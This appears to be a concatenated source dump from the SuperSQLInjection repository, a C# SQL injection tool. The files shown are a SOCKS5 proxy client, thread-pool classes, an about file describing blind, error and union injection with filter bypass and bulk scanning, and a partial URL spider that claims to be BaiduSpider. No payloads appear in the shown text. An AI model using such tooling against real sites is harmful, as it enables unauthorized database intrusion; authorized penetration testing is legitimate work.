Exception("不能获得代理服务器正确响应。"); 108 | } 109 | 110 | else if (bySock5Receive[0] != 5 || (bySock5Receive[1] != 0 && bySock5Receive[1] != 2)) 111 | { 112 | throw new Exception("代理服务其返回的响应错误。"); 113 | } 114 | else 115 | { 116 | //用户验证   117 | if (bySock5Receive[1] == 2) 118 | { 119 | if (String.IsNullOrEmpty(username) && String.IsNullOrEmpty(password)) 120 | { 121 | throw new Exception("代理服务器需要进行身份确认,您未设置代理账号和密码。"); 122 | } 123 | } 124 | 125 | if (bySock5Receive[1] == 0) 126 | { 127 | byte[] data = GetConectTargetByte(host, port); 128 | sProxyServer.Client.Send(data, data.Length, SocketFlags.None); 129 | byte[] readData = new byte[100]; 130 | readCount = sProxyServer.Client.Receive(readData, readData.Length, SocketFlags.None); 131 | 132 | if (readCount >= 2 && bySock5Receive[0] == 5 && bySock5Receive[1] == 0) 133 | { 134 | return true; 135 | } 136 | else 137 | { 138 | //利用Socks5代理连接目标出错。 139 | return false; 140 | } 141 | } 142 | 143 | } 144 | } 145 | catch (Exception e) 146 | { 147 | Tools.SysLog("Socks5代理发生异常!" 
+ e.Message); 148 | } 149 | finally { 150 | sw.Stop(); 151 | ConectProxyUseTime = (int)sw.ElapsedMilliseconds; 152 | sw.Reset(); 153 | } 154 | return false; 155 | } 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/PriorityQueue.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.Diagnostics; 5 | 6 | namespace Amib.Threading.Internal 7 | { 8 | #region PriorityQueue class 9 | 10 | /// 11 | /// PriorityQueue class 12 | /// This class is not thread safe because we use external lock 13 | /// 14 | public sealed class PriorityQueue : IEnumerable 15 | { 16 | #region Private members 17 | 18 | /// 19 | /// The number of queues, there is one for each type of priority 20 | /// 21 | private const int _queuesCount = WorkItemPriority.Highest-WorkItemPriority.Lowest+1; 22 | 23 | /// 24 | /// Work items queues. There is one for each type of priority 25 | /// 26 | private readonly LinkedList[] _queues = new LinkedList[_queuesCount]; 27 | 28 | /// 29 | /// The total number of work items within the queues 30 | /// 31 | private int _workItemsCount; 32 | 33 | /// 34 | /// Use with IEnumerable interface 35 | /// 36 | private int _version; 37 | 38 | #endregion 39 | 40 | #region Contructor 41 | 42 | public PriorityQueue() 43 | { 44 | for(int i = 0; i < _queues.Length; ++i) 45 | { 46 | _queues[i] = new LinkedList(); 47 | } 48 | } 49 | 50 | #endregion 51 | 52 | #region Methods 53 | 54 | /// 55 | /// Enqueue a work item. 
56 | /// 57 | /// A work item 58 | public void Enqueue(IHasWorkItemPriority workItem) 59 | { 60 | Debug.Assert(null != workItem); 61 | 62 | int queueIndex = _queuesCount-(int)workItem.WorkItemPriority-1; 63 | Debug.Assert(queueIndex >= 0); 64 | Debug.Assert(queueIndex < _queuesCount); 65 | 66 | _queues[queueIndex].AddLast(workItem); 67 | ++_workItemsCount; 68 | ++_version; 69 | } 70 | 71 | /// 72 | /// Dequeque a work item. 73 | /// 74 | /// Returns the next work item 75 | public IHasWorkItemPriority Dequeue() 76 | { 77 | IHasWorkItemPriority workItem = null; 78 | 79 | if(_workItemsCount > 0) 80 | { 81 | int queueIndex = GetNextNonEmptyQueue(-1); 82 | Debug.Assert(queueIndex >= 0); 83 | workItem = _queues[queueIndex].First.Value; 84 | _queues[queueIndex].RemoveFirst(); 85 | Debug.Assert(null != workItem); 86 | --_workItemsCount; 87 | ++_version; 88 | } 89 | 90 | return workItem; 91 | } 92 | 93 | /// 94 | /// Find the next non empty queue starting at queue queueIndex+1 95 | /// 96 | /// The index-1 to start from 97 | /// 98 | /// The index of the next non empty queue or -1 if all the queues are empty 99 | /// 100 | private int GetNextNonEmptyQueue(int queueIndex) 101 | { 102 | for(int i = queueIndex+1; i < _queuesCount; ++i) 103 | { 104 | if(_queues[i].Count > 0) 105 | { 106 | return i; 107 | } 108 | } 109 | return -1; 110 | } 111 | 112 | /// 113 | /// The number of work items 114 | /// 115 | public int Count 116 | { 117 | get 118 | { 119 | return _workItemsCount; 120 | } 121 | } 122 | 123 | /// 124 | /// Clear all the work items 125 | /// 126 | public void Clear() 127 | { 128 | if (_workItemsCount > 0) 129 | { 130 | foreach(LinkedList queue in _queues) 131 | { 132 | queue.Clear(); 133 | } 134 | _workItemsCount = 0; 135 | ++_version; 136 | } 137 | } 138 | 139 | #endregion 140 | 141 | #region IEnumerable Members 142 | 143 | /// 144 | /// Returns an enumerator to iterate over the work items 145 | /// 146 | /// Returns an enumerator 147 | public IEnumerator 
GetEnumerator() 148 | { 149 | return new PriorityQueueEnumerator(this); 150 | } 151 | 152 | #endregion 153 | 154 | #region PriorityQueueEnumerator 155 | 156 | /// 157 | /// The class the implements the enumerator 158 | /// 159 | private class PriorityQueueEnumerator : IEnumerator 160 | { 161 | private readonly PriorityQueue _priorityQueue; 162 | private int _version; 163 | private int _queueIndex; 164 | private IEnumerator _enumerator; 165 | 166 | public PriorityQueueEnumerator(PriorityQueue priorityQueue) 167 | { 168 | _priorityQueue = priorityQueue; 169 | _version = _priorityQueue._version; 170 | _queueIndex = _priorityQueue.GetNextNonEmptyQueue(-1); 171 | if (_queueIndex >= 0) 172 | { 173 | _enumerator = _priorityQueue._queues[_queueIndex].GetEnumerator(); 174 | } 175 | else 176 | { 177 | _enumerator = null; 178 | } 179 | } 180 | 181 | #region IEnumerator Members 182 | 183 | public void Reset() 184 | { 185 | _version = _priorityQueue._version; 186 | _queueIndex = _priorityQueue.GetNextNonEmptyQueue(-1); 187 | if (_queueIndex >= 0) 188 | { 189 | _enumerator = _priorityQueue._queues[_queueIndex].GetEnumerator(); 190 | } 191 | else 192 | { 193 | _enumerator = null; 194 | } 195 | } 196 | 197 | public object Current 198 | { 199 | get 200 | { 201 | Debug.Assert(null != _enumerator); 202 | return _enumerator.Current; 203 | } 204 | } 205 | 206 | public bool MoveNext() 207 | { 208 | if (null == _enumerator) 209 | { 210 | return false; 211 | } 212 | 213 | if(_version != _priorityQueue._version) 214 | { 215 | throw new InvalidOperationException("The collection has been modified"); 216 | 217 | } 218 | if (!_enumerator.MoveNext()) 219 | { 220 | _queueIndex = _priorityQueue.GetNextNonEmptyQueue(_queueIndex); 221 | if(-1 == _queueIndex) 222 | { 223 | return false; 224 | } 225 | _enumerator = _priorityQueue._queues[_queueIndex].GetEnumerator(); 226 | _enumerator.MoveNext(); 227 | return true; 228 | } 229 | return true; 230 | } 231 | 232 | #endregion 233 | } 234 | 235 | 
#endregion
    }

    #endregion
}
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/WorkItem.WorkItemResult.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Text;
using System.Threading;

namespace Amib.Threading.Internal
{
    public partial class WorkItem
    {
        #region WorkItemResult class

        /// <summary>
        /// Result handle for a work item. Every member forwards to the
        /// wrapped <see cref="WorkItem"/>; no state is kept here besides
        /// the back reference.
        /// </summary>
        private class WorkItemResult : IWorkItemResult, IInternalWorkItemResult, IInternalWaitableResult
        {
            /// <summary>
            /// A back reference to the work item
            /// </summary>
            private readonly WorkItem _workItem;

            public WorkItemResult(WorkItem workItem)
            {
                _workItem = workItem;
            }

            internal WorkItem GetWorkItem()
            {
                return _workItem;
            }

            /// <summary>
            /// Convert a TimeSpan timeout to whole milliseconds.
            /// </summary>
            // NOTE(review): the cast truncates and is not range-checked here;
            // confirm callers keep the timeout within int range.
            private static int ToMilliseconds(TimeSpan timeout)
            {
                return (int)timeout.TotalMilliseconds;
            }

            #region IWorkItemResult Members

            public bool IsCompleted
            {
                get { return _workItem.IsCompleted; }
            }

            public bool IsCanceled
            {
                get { return _workItem.IsCanceled; }
            }

            /// <summary>
            /// Get the result with Timeout.Infinite, exitContext = true and
            /// no cancel wait handle.
            /// </summary>
            public object GetResult()
            {
                return _workItem.GetResult(Timeout.Infinite, true, null);
            }

            public object GetResult(int millisecondsTimeout, bool exitContext)
            {
                return _workItem.GetResult(millisecondsTimeout, exitContext, null);
            }

            public object GetResult(TimeSpan timeout, bool exitContext)
            {
                return _workItem.GetResult(ToMilliseconds(timeout), exitContext, null);
            }

            public object GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle)
            {
                return _workItem.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle);
            }

            public object GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle)
            {
                return _workItem.GetResult(ToMilliseconds(timeout), exitContext, cancelWaitHandle);
            }

            // The overloads below hand the work item's exception back through
            // the out parameter of the underlying call.

            public object GetResult(out Exception e)
            {
                return _workItem.GetResult(Timeout.Infinite, true, null, out e);
            }

            public object GetResult(int millisecondsTimeout, bool exitContext, out Exception e)
            {
                return _workItem.GetResult(millisecondsTimeout, exitContext, null, out e);
            }

            public object GetResult(TimeSpan timeout, bool exitContext, out Exception e)
            {
                return _workItem.GetResult(ToMilliseconds(timeout), exitContext, null, out e);
            }

            public object GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e)
            {
                return _workItem.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle, out e);
            }

            public object GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e)
            {
                return _workItem.GetResult(ToMilliseconds(timeout), exitContext, cancelWaitHandle, out e);
            }

            /// <summary>
            /// Cancel the work item without aborting its execution.
            /// </summary>
            public bool Cancel()
            {
                return _workItem.Cancel(false);
            }

            public bool Cancel(bool abortExecution)
            {
                return _workItem.Cancel(abortExecution);
            }

            public object State
            {
                get { return _workItem._state; }
            }

            public WorkItemPriority WorkItemPriority
            {
                get { return _workItem._workItemInfo.WorkItemPriority; }
            }

            /// <summary>
            /// Return the result, same as GetResult()
            /// </summary>
            public object Result
            {
                get
                {
                    return GetResult();
                }
            }

            /// <summary>
            /// Returns the exception if one occurred, otherwise returns null.
            /// This value is valid only after the work item completed,
            /// before that it is always null.
            /// </summary>
            public object Exception
            {
                get
                {
                    return _workItem._exception;
                }
            }

            #endregion

            #region IInternalWorkItemResult Members

            // Both events subscribe to / unsubscribe from the wrapped work item.

            public event WorkItemStateCallback OnWorkItemStarted
            {
                add { _workItem.OnWorkItemStarted += value; }
                remove { _workItem.OnWorkItemStarted -= value; }
            }


            public event WorkItemStateCallback OnWorkItemCompleted
            {
                add { _workItem.OnWorkItemCompleted += value; }
                remove { _workItem.OnWorkItemCompleted -= value; }
            }

            #endregion

            // NOTE(review): this region repeats the previous region's label;
            // the members below presumably implement IInternalWaitableResult - confirm.
            #region IInternalWorkItemResult Members

            public IWorkItemResult GetWorkItemResult()
            {
                return this;
            }

            // NOTE(review): generic type arguments appear to be missing from
            // this listing (signature and wrapper construction) - confirm
            // against the repository copy.
            public IWorkItemResult GetWorkItemResultT()
            {
                return new WorkItemResultTWrapper(this);
            }

            #endregion
        }

        #endregion

    }
}
--------------------------------------------------------------------------------
/SuperSQLInjection/about.resx:
--------------------------------------------------------------------------------
1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 超级SQL注入工具 122 | 说明: 123 | 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。 124 | 支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。 125 | 支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 126 | 
支持Bool型盲注、错误显示注入、Union注入。 127 | 支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 128 | 支持简单的SQL注入绕过,可灵活进行字符替换绕过注入防护。 129 | 支持批量爬行扫描SQL注入或导入连接,批量探测是否可以注入。 130 | 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。不适合新手人员使用,谢谢! 131 | 工具特点: 132 | 1.支持任意地点出现的任意SQL注入 133 | 2.支持全自动识别注入标记,也可人工识别注入并标记。 134 | 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 135 | 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 136 | 5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。 137 | 官网:www.shack2.org 138 | 139 | -------------------------------------------------------------------------------- /SuperSQLInjection/scan/Spider.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using SuperSQLInjection.model; 5 | using SuperSQLInjection.tools; 6 | using tools; 7 | using model; 8 | using System.Text.RegularExpressions; 9 | using System.Threading; 10 | using System.Collections; 11 | 12 | namespace SuperSQLInjection.scan 13 | { 14 | class Spider 15 | { 16 | 17 | public List AllURL = new List(); 18 | public List AllNoParamaValURL = new List();//用于去掉相似URL 19 | public static Config config=null; 20 | public static String reqestGetTemplate = "GET {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nHost: {host}"; 21 | public static String reqestPOSTTemplate = "POST {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nHost: {host}\r\n\r\n{data}"; 22 | public void findLinks(String url) 23 | { 24 | try 25 | { 26 | if (url.IndexOf("https") != -1) 27 | { 28 | config.useSSL = true; 29 | } 30 | else { 31 | config.useSSL = false; 32 | } 33 | ServerInfo sever = URLTools.getHostAndPathQueryByURL(url); 34 | Uri uri = new Uri(url); 35 | String crequest = reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port); 36 | 37 | String rootPath = ""; 38 | 
if (("http".Equals(uri.Scheme) && uri.Port == 80) || ("https".Equals(uri.Scheme) && uri.Port == 443)) 39 | { 40 | 41 | rootPath = uri.Scheme + "://" + uri.Host; 42 | } 43 | else 44 | { 45 | rootPath = uri.Scheme + "://" + uri.Host + ":" + uri.Port; 46 | } 47 | ServerInfo urlServer = sendHTTP(url.StartsWith("https",StringComparison.OrdinalIgnoreCase),sever.host, sever.port, crequest); 48 | 49 | String rootHost = Tools.getRootDomain(uri.Host); 50 | //当前URL目录 51 | String cpath = rootPath + Tools.getCurrentPath(uri.AbsolutePath); 52 | int count = 0; 53 | if (urlServer != null) 54 | { 55 | //抓取连接+* 56 | //Thread.Sleep(200); 57 | Match m; 58 | Regex reg = new Regex("href=(['\"\\S]?)(?[^'\"]*)", RegexOptions.IgnoreCase); 59 | if (urlServer.code == 200 && urlServer.body.Length > 10) 60 | { 61 | for (m = reg.Match(urlServer.body); m.Success; m = m.NextMatch()) 62 | { 63 | String curl = m.Groups["href"].Value; 64 | if (!String.IsNullOrEmpty(curl)) 65 | { 66 | if (!curl.Contains("?") || !curl.Contains("=")) 67 | { 68 | continue; 69 | } 70 | 71 | if (curl.ToLower().Contains("javascript:")) 72 | { 73 | continue; 74 | } 75 | if (!curl.Contains(".") && !curl.Contains("/")) 76 | { 77 | continue; 78 | } 79 | 80 | curl = curl.Replace("&", "&"); 81 | if (curl.StartsWith("//")) 82 | { 83 | 84 | curl = "http:" + curl; 85 | 86 | } 87 | else if (curl.StartsWith("/")) 88 | { 89 | 90 | curl = rootPath + curl; 91 | 92 | } 93 | else if (curl.IndexOf("http://") == -1 && curl.IndexOf("www.") == -1 && curl.IndexOf(".com") == -1 && curl.IndexOf(".cn") == -1 && curl.IndexOf(".tw") == -1 && curl.IndexOf(".jp") == -1) 94 | { 95 | //相对路径 96 | 97 | curl = cpath + curl; 98 | } 99 | 100 | if (curl.IndexOf(">")!=-1) { 101 | curl = curl.Substring(0, curl.IndexOf(">")); 102 | } 103 | 104 | if (curl.Contains(rootHost)) 105 | { 106 | //过滤相似URL 107 | String noValURL = Tools.clearURLParams(curl); 108 | try 109 | { 110 | Uri cu = new Uri(curl); 111 | String cupath = cu.AbsolutePath; 112 | if 
(cupath.EndsWith(".css") || cupath.EndsWith(".js") || cupath.EndsWith(".jpg") || cupath.EndsWith(".png") || cupath.EndsWith(".ico") || cupath.EndsWith(".gif")) 113 | { 114 | continue; 115 | } 116 | if (!AllURL.Contains(curl) && !AllNoParamaValURL.Contains(noValURL)&&AllURL.Count